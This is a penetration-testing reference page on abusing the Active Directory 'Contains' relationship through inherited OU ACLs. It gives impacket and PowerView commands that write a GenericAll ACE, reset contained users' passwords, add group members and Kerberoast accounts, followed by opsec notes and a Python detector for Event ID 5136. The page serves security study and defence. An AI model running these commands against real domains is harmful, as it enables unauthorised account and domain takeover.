Contains

An OU or Domain contains (is the parent of) the target object. When combined with write access over the OU, ACL inheritance enables attacks on all contained objects.

Applies to: Domain/OU → User/Group/Computer/OU


Note

Contains is structural. It becomes an abuse path when you have GenericAll, WriteDACL, or GenericWrite on the OU: an inheritable ACE written to the OU ACL flows down to every contained object that has not blocked inheritance.


Linux Abuse

Add ACE to OU DACL, granting yourself GenericAll on all contained objects

# Using dacledit.py (impacket)
dacledit.py -action write -rights FullControl -principal <username> -target-dn 'OU=<ou-name>,DC=<domain>,DC=<tld>' '<domain>/<username>:<password>' -dc-ip <dc-ip>

Verify ACE written

dacledit.py -action read -target-dn 'OU=<ou-name>,DC=<domain>,DC=<tld>' '<domain>/<username>:<password>' -dc-ip <dc-ip>

Reset password of user in OU (after inheriting GenericAll)

changepasswd.py -newpass '<new-password>' '<domain>/<username>:<password>'@<dc-ip> -target '<domain>/<target-user>'

Add a computer account (addcomputer.py creates a machine account; it does not change group membership)

addcomputer.py -computer-name '<computer-name>$' -computer-pass '<password>' -dc-ip <dc-ip> '<domain>/<username>:<password>'

Targeted Kerberoast user in OU (after setting SPN via GenericWrite)

targetedKerberoast.py -d <domain> -u <username> -p '<password>' --dc-ip <dc-ip>

Windows Abuse

Add ACE granting GenericAll on OU (PowerView)

Add-DomainObjectAcl -TargetIdentity '<ou-name>' -PrincipalIdentity <username> -Rights All -Verbose

Confirm the ACE is present on the OU and marked inheritable (check InheritanceFlags on the returned ACEs)

Get-DomainObjectAcl -Identity '<ou-name>' -ResolveGUIDs | Where-Object {$_.SecurityIdentifier -match '<sid>'}

Reset contained user password after ACL inheritance

$cred = New-Object System.Management.Automation.PSCredential('<domain>\<username>', (ConvertTo-SecureString '<password>' -AsPlainText -Force))
Set-DomainUserPassword -Identity <target-user> -AccountPassword (ConvertTo-SecureString '<new-password>' -AsPlainText -Force) -Credential $cred

Add user to group after ACL inheritance

Add-DomainGroupMember -Identity '<group-name>' -Members '<username>' -Credential $cred

Enable ACL inheritance on all objects in OU (if blocked)

# Requires the ActiveDirectory module, which provides the AD: drive used by Get-Acl/Set-Acl
Import-Module ActiveDirectory
Get-ADObject -Filter * -SearchBase 'OU=<ou-name>,DC=<domain>,DC=<tld>' | ForEach-Object {
    $acl = Get-Acl -Path "AD:\$($_.DistinguishedName)"
    # isProtected=$false re-enables inheritance; the second argument is ignored in that case
    $acl.SetAccessRuleProtection($false, $true)
    Set-Acl -Path "AD:\$($_.DistinguishedName)" -AclObject $acl
}

Opsec

  • Writing ACEs to an OU generates Event ID 5136 (directory service object modified) when Directory Service Changes auditing is enabled and the object carries a SACL
  • ACL inheritance propagation is not immediate; it may take seconds to minutes
  • Prefer targeting specific objects over blanket OU ACL modification to reduce noise
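Added detection-side example (not code from the original page): it scans constructed Event ID 5136 records, with field names mirroring the event's EventData, for an inheritable ACE that grants takeover rights on the DACL of an OU or domain object, which is exactly the write the Opsec note above says produces 5136. The allowlist of expected principals is an assumption to tune per environment.

```python
"""Flag 5136 records adding an inheritable takeover ACE (GA, GW, WD, WO) to an OU/domain DACL."""
import re

# SDDL ACE layout: (ace_type;ace_flags;rights;object_guid;inherit_object_guid;sid)
ACE_RE = re.compile(r"\(([^;]*);([^;]*);([^;]*);([^;]*);([^;]*);([^)]*)\)")
TAKEOVER_CODES = {"GA", "GW", "WD", "WO"}            # GenericAll, GenericWrite, WriteDACL, WriteOwner
TAKEOVER_MASK = 0x10000000 | 0x40000000 | 0x40000 | 0x80000  # same rights as a hex access mask
EXPECTED_PRINCIPALS = {"SY", "BA", "DA", "EA", "AO"}  # constructed allowlist; tune for the environment
CONTAINER_CLASSES = {"organizationalUnit", "domainDNS"}
VALUE_ADDED = "%%14674"                               # 5136 OperationType meaning "Value Added"

def grants_takeover(rights: str) -> bool:
    """True if an SDDL rights field (two-letter codes or hex mask) includes a takeover right."""
    if rights.lower().startswith("0x"):
        return bool(int(rights, 16) & TAKEOVER_MASK)
    return any(rights[i:i + 2] in TAKEOVER_CODES for i in range(0, len(rights), 2))

def inheritable_takeover_aces(sddl: str) -> list:
    """Allow ACEs that are inheritable (CI or OI flag) and grant takeover rights to an unexpected SID."""
    hits = []
    for ace_type, flags, rights, _obj, _inh, sid in ACE_RE.findall(sddl):
        inheritable = "CI" in flags or "OI" in flags
        if ace_type == "A" and inheritable and grants_takeover(rights) and sid not in EXPECTED_PRINCIPALS:
            hits.append({"flags": flags, "rights": rights, "sid": sid})
    return hits

def suspicious_ou_dacl_changes(events: list) -> list:
    """One alert per 5136 event that adds an inheritable takeover ACE to an OU or domain DACL."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 5136 or ev.get("AttributeLDAPDisplayName") != "nTSecurityDescriptor":
            continue
        if ev.get("ObjectClass") not in CONTAINER_CLASSES or ev.get("OperationType") != VALUE_ADDED:
            continue
        aces = inheritable_takeover_aces(ev.get("AttributeValue", ""))
        if aces:
            alerts.append({"actor": ev["SubjectUserName"], "object": ev["ObjectDN"], "aces": aces})
    return alerts

# Constructed sample records mirroring the EventData fields of Event ID 5136.
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "jdoe", "ObjectDN": "OU=Workstations,DC=corp,DC=example",
     "ObjectClass": "organizationalUnit", "AttributeLDAPDisplayName": "nTSecurityDescriptor",
     "OperationType": "%%14674",
     "AttributeValue": "O:DAG:DAD:AI(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)(A;OICI;GA;;;S-1-5-21-1111-2222-3333-1105)"},
    {"EventID": 5136, "SubjectUserName": "svc-gpo", "ObjectDN": "OU=Workstations,DC=corp,DC=example",
     "ObjectClass": "organizationalUnit", "AttributeLDAPDisplayName": "gPLink",
     "OperationType": "%%14674", "AttributeValue": "[LDAP://cn={guid-placeholder},CN=Policies;0]"},
    {"EventID": 5136, "SubjectUserName": "jdoe", "ObjectDN": "CN=alice,OU=Staff,DC=corp,DC=example",
     "ObjectClass": "user", "AttributeLDAPDisplayName": "nTSecurityDescriptor",
     "OperationType": "%%14674", "AttributeValue": "D:(A;;GA;;;S-1-5-21-1111-2222-3333-1105)"},
]
```

Only the first record fires: the gPLink change is a different attribute, and the per-user ACE is neither on a container nor inheritable.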